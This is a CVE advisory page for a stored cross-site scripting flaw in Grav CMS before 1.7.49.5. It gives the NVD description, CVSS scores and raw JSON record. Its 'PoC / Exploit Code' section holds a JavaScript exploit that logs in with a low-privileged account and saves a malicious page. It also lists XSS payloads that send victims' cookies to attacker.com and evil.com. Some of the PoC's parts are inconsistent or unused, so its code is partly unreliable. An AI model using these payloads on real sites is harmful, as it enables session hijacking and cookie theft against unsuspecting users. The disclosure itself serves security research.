Security Vulnerability Report
CVE-2025-66843 CVSS 5.4 MEDIUM


Published: 2025-12-15 16:15:53
Last Modified: 2025-12-17 15:39:30

Description

grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE
Grav CMS < v1.7.49.5
All Grav versions below 1.7.49.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-66843 Stored XSS PoC for Grav CMS
// Author: Security Researcher
// Target: Grav CMS < v1.7.49.5

// Step 1: Authenticate with low-privileged account
const loginUrl = 'https://target-site.com/grav/admin';
const credentials = {
  'username': 'attacker_user',
  'password': 'attacker_password'
};

// Step 2: Create new page with XSS payload
const pageTitle = '<img src=x onerror=fetch(`https://attacker.com/steal?c=${document.cookie}`)>';
const pageContent = '<h1>Injected Content</h1><script>console.log("XSS Executed")</script>';

// Step 3: Payload variations
const payloads = [
  '<svg onload=alert(document.domain)>',
  '<img src=x onerror=document.location="https://evil.com/log?"+document.cookie>',
  '<iframe src="javascript:fetch(\'https://attacker.com?data=\'+btoa(document.cookie))">',
  '<body onload=fetch("https://attacker.com/exfil?cookie="+encodeURIComponent(document.cookie))>'
];

// Step 4: Send malicious page to server
async function exploitGravXSS() {
  // Login request
  const loginResponse = await fetch(loginUrl + '/task:login', {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: new URLSearchParams(credentials)
  });

  // Create page with XSS payload
  const createPageUrl = loginUrl + '/task:save';
  const pageData = {
    'page[title]': payloads[0],
    'page[content]': pageContent,
    'page[route]': '/malicious-page',
    'page[template]': 'default'
  };
  const saveResponse = await fetch(createPageUrl, {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(pageData)
  });
  return saveResponse.ok;
}

// Step 5: When victim views the page, cookie is stolen automatically
// The stored XSS payload executes in victim's browser context
```

References

https://github.com/Yohane-Mashiro/grav_cve/issues/1 (Exploit, Issue Tracking, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66843",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T16:15:53.387",
    "lastModified": "2025-12-17T15:39:29.613",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.7.49.5",
                "matchCriteriaId": "4635A1D7-7801-4263-A58C-17941EE530B4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]
      }
    ]
  }
}
```